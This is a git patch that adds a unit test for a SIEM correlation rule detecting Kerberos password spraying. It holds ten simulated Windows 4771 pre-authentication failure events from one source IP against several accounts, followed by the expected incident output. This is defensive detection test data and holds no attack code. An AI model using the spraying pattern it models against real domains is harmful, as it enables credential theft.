=?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Kerberos=5Fpwd=5F?= =?UTF-8?q?spraying)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Kerberos_pwd_spraying/tests/test_1.sc | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc new file mode 100644 index 00000000..ba66c9ce --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc @@ -0,0 +1,13 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:29:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:29:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f9c"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30c}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:31:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"mc\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "mc", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:31:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f9f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30a}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:33:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"bob\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "bob", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:33:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e512f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30b}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:34:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"corn\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "corn", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:34:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e513f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30r}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:35:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"smoorf\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:35:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e514f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:29:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:29:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f8c"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30c}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:31:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"mc1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "mc1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:31:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f8f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30a}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:33:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"bob1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "bob1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:33:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e522f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30b}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:34:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"corn1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "corn1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:34:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e523f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30r}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:35:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"smoorf1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:35:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e524f"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "execute", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Brute Force: Password Spraying", "correlation_name": "Kerberos_pwd_spraying", "correlation_type": "incident", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "incident.aggregation.key": "Kerberos_pwd_spraying|172.16.66.1", "incident.aggregation.timeout": 3600, "incident.category": "UserCompromising", "incident.severity": "low", "object": "request", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf1"} \ No newline at end of file From f6774e092ee323632dbe756c9760f687db4d3b73 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 18:55:03 +0300 Subject: [PATCH 10/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(LSASS=5FDump=5FCreate)?= MIME-Version: 1.0 